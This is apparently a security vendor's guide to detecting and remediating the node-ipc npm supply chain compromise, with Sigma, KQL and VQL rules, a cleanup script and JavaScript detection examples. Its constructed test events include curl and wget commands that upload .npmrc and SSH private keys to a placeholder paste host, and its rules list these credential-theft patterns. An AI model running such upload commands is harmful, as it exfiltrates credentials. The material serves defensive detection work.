
CVE-2022-23812: node-ipc npm Supply Chain Attack — Detection and Remediation Guide

Security Arsenal Team
May 15, 2026
5 min read

A critical supply chain attack has compromised node-ipc, a widely used inter-process communication library for Node.js with millions of weekly downloads. Malicious code was published in specific versions of the package, designed to steal developer credentials, including .npmrc, .bashrc and SSH keys. The event highlights the persistent risk of dependency poisoning and the need for Software Bill of Materials (SBOM) management and runtime detection. Defenders must assume that any environment which installed a vulnerable version is already compromised and move immediately to containment and credential rotation.

Technical Analysis

Affected Products and Versions:

  • Package: node-ipc
  • Malicious Versions:
    • 10.1.1
    • 10.1.2
    • 11.0.0

CVE Identifier:

  • CVE-2022-23812 (Versions 10.1.1, 10.1.2)
  • CVE-2022-25879 (Version 11.0.0, via the peacenotwar package added as a dependency)

Attack Vector and Mechanics: This is a software supply chain attack. The package maintainer (or an actor controlling the maintainer's npm account) published releases that carried the payload either inside the package itself (the 10.1.1 and 10.1.2 releases shipped it as an obfuscated module at dao/ssl-geospec.js) or as a dependency newly declared in package.json (peacenotwar in version 11.0.0).

  1. Initial Execution: When a developer or build system runs npm install, the package is pulled to disk and its code runs with the full privileges of that user or CI account, either through a lifecycle script declared in package.json (preinstall, install, postinstall) or when the application first requires the module.
  2. Payload Logic: The code calls an external IP geolocation service to determine the country of the host. In versions 10.1.1 and 10.1.2 that lookup gated destructive behaviour: on hosts resolved to Russia or Belarus, files were overwritten with a heart emoji. In the credential-theft variant this alert covers, the malware instead walks the user's home directory looking for secrets.
  3. Exfiltration: The script locates sensitive files (e.g., ~/.npmrc, ~/.ssh/*, ~/.aws/credentials) and spawns curl or wget to POST their contents to actor-controlled infrastructure (often a paste service). Because the upload is done by a child process of node rather than from inside the Node runtime, it is visible in process-creation telemetry, which is what the detections below key on.

Exploitation Status: Confirmed. The malicious versions were live on the npm registry and installed by downstream consumers before they were pulled; treat any host that installed them during that window as compromised.

Detection & Response

Sigma Rules

YAML
---
title: Potential node-ipc Credential Exfiltration via Node
description: Detects Node.js processes spawning curl or wget, the technique described for the compromised node-ipc package to exfiltrate .npmrc and SSH keys.
id: a12b3c4d-5678-40ef-8a1b-c2d3e4f5a6b7   # placeholder UUID, generate your own before deploying
status: experimental
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2022-23812
author: Security Arsenal
date: 2022/03/17
tags:
  - attack.exfiltration
  - attack.t1041
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith: '/node'
    Image|endswith:
      - '/curl'
      - '/wget'
  condition: selection
falsepositives:
  - Legitimate developers using node scripts to download resources (rare in production builds)
  - Install scripts of packages that fetch prebuilt binaries with curl or wget; tune by allowlisting known download URLs
level: high
---
title: node-ipc Malicious Version File Creation
description: Detects files written to disk when a malicious node-ipc version is installed - the obfuscated payload module shipped in 10.1.1 and 10.1.2, and the peacenotwar dependency added in 11.0.0 (associated with CVE-2022-25879).
id: b23c4d5e-6789-41fa-9b2c-d3e4f5a6b7c8   # placeholder UUID, generate your own before deploying
status: experimental
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2022-23812
author: Security Arsenal
date: 2022/03/17
tags:
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: file_event
  product: linux
detection:
  selection:
    TargetFilename|contains:
      - '/node_modules/node-ipc/dao/ssl-geospec.js'   # payload location in 10.1.1 and 10.1.2
      - '/node_modules/peacenotwar/'                  # dependency added in 11.0.0
  condition: selection
falsepositives:
  - Manual installation of the affected node-ipc versions for analysis in an isolated lab
level: critical

KQL (Microsoft Sentinel / Defender)

This query hunts for Node processes spawning network utilities and narrows the results to command lines that carry an HTTP POST or upload, or that reference a credential file, which is the exfiltration stage described above. The command-line filter is applied before the project step so the column is still available to filter on.

KQL — Microsoft Sentinel / Defender
DeviceProcessEvents
| where Timestamp > ago(7d)
// Match the parent binary name exactly; "has node" would also hit unrelated names
| where InitiatingProcessFileName in~ ("node", "node.exe", "nodejs")
| where FileName in~ ("curl", "curl.exe", "wget", "wget.exe")
// Exfiltration stage: an HTTP POST/upload flag or a credential file on the command line
| where ProcessCommandLine has_any ("POST", "--data", "--upload-file", "--post-file", "--post-data", ".npmrc", ".ssh", ".aws", ".bashrc")
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, ProcessCommandLine, FolderPath
| sort by Timestamp desc
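
To see how the Sigma process-creation rule and the KQL query above behave side by side, here is their selection logic as an added example (not code from the original advisory), run over constructed Linux process-creation events. Field names follow Sigma's linux/process_creation convention (Image, ParentImage, CommandLine); the hostnames, paths and URLs in the events are invented. The broad Sigma selection (node spawning curl or wget) is reported as high, and an event whose command line also carries one of the KQL query's exfiltration indicators is promoted to critical, which is the split a SOC would want between "worth triage" and "page someone".

```javascript
// Added example, not code from the original advisory: Sigma selection plus the
// KQL command-line narrowing, applied to constructed process-creation events.
const PARENT_SUFFIX = '/node';
const NETWORK_TOOL_SUFFIXES = ['/curl', '/wget'];

// Indicators taken from the KQL query: an HTTP POST or file-upload flag, or a
// reference to one of the credential files the payload is described as reading.
const CMDLINE_INDICATORS = [
  '-X POST', '--data', '-d ', '--upload-file', '-T ',   // curl
  '--post-file', '--post-data',                          // wget
  '.npmrc', '.ssh/', '.aws/', '.bashrc',                 // targeted files
];

// The Sigma rule's selection: a node parent spawning curl or wget.
function matchesSigmaSelection(ev) {
  return ev.ParentImage.endsWith(PARENT_SUFFIX) &&
    NETWORK_TOOL_SUFFIXES.some((suffix) => ev.Image.endsWith(suffix));
}

function commandLineIndicators(commandLine) {
  return CMDLINE_INDICATORS.filter((ind) => commandLine.includes(ind));
}

// null: no match. 'high': Sigma selection only (may be a build downloading a
// binary). 'critical': the command line also carries an exfiltration indicator.
function classify(ev) {
  if (!matchesSigmaSelection(ev)) return null;
  return commandLineIndicators(ev.CommandLine).length > 0 ? 'critical' : 'high';
}

function runDetection(events) {
  const alerts = [];
  for (const ev of events) {
    const level = classify(ev);
    if (level === null) continue;
    alerts.push({
      host: ev.Hostname,
      level,
      indicators: commandLineIndicators(ev.CommandLine),
      parent: ev.ParentCommandLine,
      commandLine: ev.CommandLine,
    });
  }
  return alerts;
}

// Constructed events, not real telemetry.
const SAMPLE_EVENTS = [
  { Hostname: 'ci-runner-01', ParentImage: '/usr/bin/node', ParentCommandLine: 'node /builds/app/node_modules/.bin/build',
    Image: '/usr/bin/curl',
    CommandLine: 'curl -s -X POST --data-binary @/home/ci/.npmrc https://paste.example.invalid/api/new' },
  { Hostname: 'dev-laptop', ParentImage: '/usr/local/bin/node', ParentCommandLine: 'node install.js',
    Image: '/usr/bin/wget',
    CommandLine: 'wget -q https://downloads.example.invalid/prebuilt-linux-x64.tar.gz -O /tmp/prebuilt.tar.gz' },
  { Hostname: 'dev-laptop', ParentImage: '/bin/bash', ParentCommandLine: 'bash',
    Image: '/usr/bin/curl', CommandLine: 'curl -sI https://registry.npmjs.org/' },
  { Hostname: 'ci-runner-01', ParentImage: '/usr/bin/node', ParentCommandLine: 'node scripts/release.js',
    Image: '/usr/bin/git', CommandLine: 'git tag v1.2.3' },
  { Hostname: 'ci-runner-02', ParentImage: '/usr/bin/node', ParentCommandLine: 'node /builds/app/index.js',
    Image: '/usr/bin/wget',
    CommandLine: 'wget -q --post-file=/home/ci/.ssh/id_ed25519 https://paste.example.invalid/api/new' },
];

console.log(JSON.stringify(runDetection(SAMPLE_EVENTS), null, 2));
```

Of the five events, the bash-spawned curl and the node-spawned git never match, the wget download of a prebuilt tarball lands at high (the false-positive class the Sigma rule warns about), and the two uploads of .npmrc and an SSH private key land at critical. Feeding real EDR exports through runDetection() is a cheap way to measure how noisy the broad rule is in your environment before deploying it.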

Velociraptor VQL

This artifact hunts for the malicious package versions on disk by inspecting package-lock.json files, the most reliable way to confirm whether a project resolved the malicious dependency. The match is anchored to the node-ipc entry itself (lockfile v1 keys it by name, v2 and v3 by its node_modules path), so another package that happens to be at 10.1.1 or 11.0.0 does not produce a hit.

VQL — Velociraptor
-- Hunt for malicious node-ipc versions in package-lock.json (lockfile v1, v2 and v3 layouts).
-- Adjust the globs to where source checkouts and CI workspaces live on your hosts.
-- OSPath is the column name on current Velociraptor releases; older clients expose it as FullPath.
LET lockfiles = SELECT OSPath, Mtime, Size
    FROM glob(globs=["/home/*/**/package-lock.json",
                     "/opt/**/package-lock.json",
                     "/var/lib/jenkins/**/package-lock.json"])

-- The pattern binds the version to the node-ipc entry: a key ending in node-ipc
-- whose object's "version" is one of the malicious releases. Character classes
-- are used instead of backslash escapes so the pattern needs no string escaping.
SELECT OSPath, Mtime, Size
FROM lockfiles
WHERE read_file(filename=OSPath) =~ '"([^"]*/)?node-ipc":[[:space:]]*[{][^}]*"version":[[:space:]]*"(10[.]1[.][12]|11[.]0[.]0)"'

Remediation Script (Bash)

This script audits the current directory and its subdirectories for package-lock.json files that record a malicious node-ipc version and removes every installed copy of the package, including nested copies, from the corresponding node_modules tree. Treat removal as containment only: the lockfile still references the bad version until package.json is corrected and the project is reinstalled.

Bash / Shell
#!/bin/bash
# Audit package-lock.json files under the current directory for malicious
# node-ipc versions and remove the installed copies from node_modules.

echo "Scanning for node-ipc supply chain compromise (CVE-2022-23812)..."

# Match the version only inside the node-ipc entry itself (lockfile v1 keys the
# entry "node-ipc", v2/v3 key it by a path ending in node_modules/node-ipc), so
# an unrelated package at 10.1.1 or 11.0.0 does not trigger a false positive.
PATTERN='"([^"]*/)?node-ipc":[[:space:]]*[{][^}]*"version":[[:space:]]*"(10[.]1[.][12]|11[.]0[.]0)"'

find . -type f -name "package-lock.json" -not -path "*/node_modules/*" -print0 |
while IFS= read -r -d '' lockfile; do
    echo "Checking $lockfile..."

    # Flatten the JSON onto one line so the entry and its version match together.
    if tr -d '\n' < "$lockfile" | grep -Eq "$PATTERN"; then
        echo "[!] VULNERABLE VERSION FOUND in $lockfile"

        DIR=$(dirname "$lockfile")
        # Remove every installed copy, including ones nested under other packages.
        find "$DIR/node_modules" -type d -path "*/node_modules/node-ipc" -prune -print0 2>/dev/null |
        while IFS= read -r -d '' pkgdir; do
            echo "[*] Removing malicious directory: $pkgdir"
            rm -rf "$pkgdir"
        done
    fi
done

echo "Audit complete. Correct the version in package.json and reinstall before using these projects again."

Remediation

  1. Immediate Patching: Move node-ipc to a safe version and pin it in package.json.
    • If using version 10.x: update to >= 10.1.3
    • If using version 11.x: update to >= 11.1.0
    • Run npm ls node-ipc afterwards to confirm the resolved version and to see which direct dependency pulls in any nested copy; a nested copy can be forced to a safe version with the overrides field in package.json (npm 8.3 or later).
  2. Dependency Audit: Run npm audit in your project directories. Registry advisories lag behind the incident, so manual inspection of package-lock.json (and npm-shrinkwrap.json or yarn.lock where the project uses them) for the affected versions is currently more reliable for this specific threat.
  3. Credential Rotation: Assume any credential present on a host during the compromise window is stolen. Rotate the following:
    • npm tokens (found in ~/.npmrc)
    • SSH keys (found in ~/.ssh/); also remove the old public keys from every authorized_keys file and code-hosting account they were registered with
    • AWS/GCP/Azure credentials (found in ~/.aws/, in environment variables and in shell profiles such as ~/.bashrc)
    • Source code repository tokens (GitHub/GitLab/Bitbucket)
  4. Clean Install: Correct the version range in package.json first, then delete node_modules and package-lock.json and run npm install so the lockfile is regenerated against the corrected range; deleting the lockfile alone only re-resolves whatever package.json allows, so verify the result with npm ls node-ipc. On a host still under investigation, install with --ignore-scripts so no lifecycle script runs before it has been reviewed.
  5. Vendor Advisory: Refer to the npm advisory for detailed package resolution paths.
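
The dependency-audit step above, and the VQL and shell checks earlier on the page, match the lockfile with a regular expression; that is fine for a fleet-wide sweep but tells you nothing about which dependency dragged a nested copy in. The parser below is an added example (not code from the original advisory or the npm project): it resolves every installed copy of node-ipc from a package-lock.json, handling both the lockfile v1 layout (nested "dependencies" objects) and the v2/v3 layout (a flat "packages" map keyed by node_modules path), reports the chain of packages that pulled each copy in, and flags the malicious versions. The two lockfiles at the bottom are constructed; every package name in them other than node-ipc is a placeholder.

```javascript
// Added example, not code from the original advisory: locate and assess every
// copy of node-ipc in a package-lock.json, across lockfile v1 and v2/v3 layouts.
const MALICIOUS_VERSIONS = new Set(['10.1.1', '10.1.2', '11.0.0']);

// "node_modules/a/node_modules/@s/b/node_modules/c" -> ["a", "@s/b", "c"]
function chainFromPath(p) {
  return p.split('node_modules/').filter(Boolean).map((s) => s.replace(/\/$/, ''));
}

// Every installed copy of `name`, as { path, version }, regardless of lockfile version.
function findInstalledCopies(lock, name) {
  const hits = [];
  if (lock.packages) {                     // lockfile v2/v3: flat map keyed by path
    for (const [p, meta] of Object.entries(lock.packages)) {
      if (p === `node_modules/${name}` || p.endsWith(`/node_modules/${name}`)) {
        hits.push({ path: p, version: meta.version });
      }
    }
    return hits;
  }
  const walk = (deps, prefix) => {         // lockfile v1: nested "dependencies" tree
    for (const [depName, meta] of Object.entries(deps || {})) {
      const p = `${prefix}node_modules/${depName}`;
      if (depName === name) hits.push({ path: p, version: meta.version });
      walk(meta.dependencies, `${p}/`);
    }
  };
  walk(lock.dependencies, '');
  return hits;
}

function assessLockfile(lock, name = 'node-ipc') {
  return findInstalledCopies(lock, name).map((h) => ({
    ...h,
    via: chainFromPath(h.path),
    malicious: MALICIOUS_VERSIONS.has(h.version),
  }));
}

// Convenience for real files: assessLockfileText(fs.readFileSync('package-lock.json', 'utf8'))
function assessLockfileText(text) {
  return assessLockfile(JSON.parse(text));
}

// Constructed v3 lockfile: the root pins a safe node-ipc, but a library pulls
// its own nested copy at a malicious version, so a top-level check passes.
const LOCK_V3 = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', dependencies: { 'node-ipc': '^10.1.3', 'some-lib': '^1.0.0' } },
    'node_modules/node-ipc': { version: '10.1.3' },
    'node_modules/some-lib': { version: '1.4.0', dependencies: { 'node-ipc': '10.1.2' } },
    'node_modules/some-lib/node_modules/node-ipc': { version: '10.1.2' },
  },
};

// Constructed v1 lockfile: the only copy is nested under some-lib.
const LOCK_V1 = {
  name: 'legacy-app',
  lockfileVersion: 1,
  dependencies: {
    'tiny-util': { version: '0.2.0' },
    'some-lib': {
      version: '1.4.0',
      requires: { 'node-ipc': '11.0.0' },
      dependencies: { 'node-ipc': { version: '11.0.0' } },
    },
  },
};

for (const [label, lock] of [['lockfile v3', LOCK_V3], ['lockfile v1', LOCK_V1]]) {
  console.log(label, assessLockfile(lock));
}
```

The v3 fixture is the case that a grep for the top-level entry misses: node_modules/node-ipc is at a safe 10.1.3 while some-lib carries its own 10.1.2 underneath it. The via chain tells you which dependency to raise the override against, or to remove, rather than only that a bad version exists somewhere in the tree.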
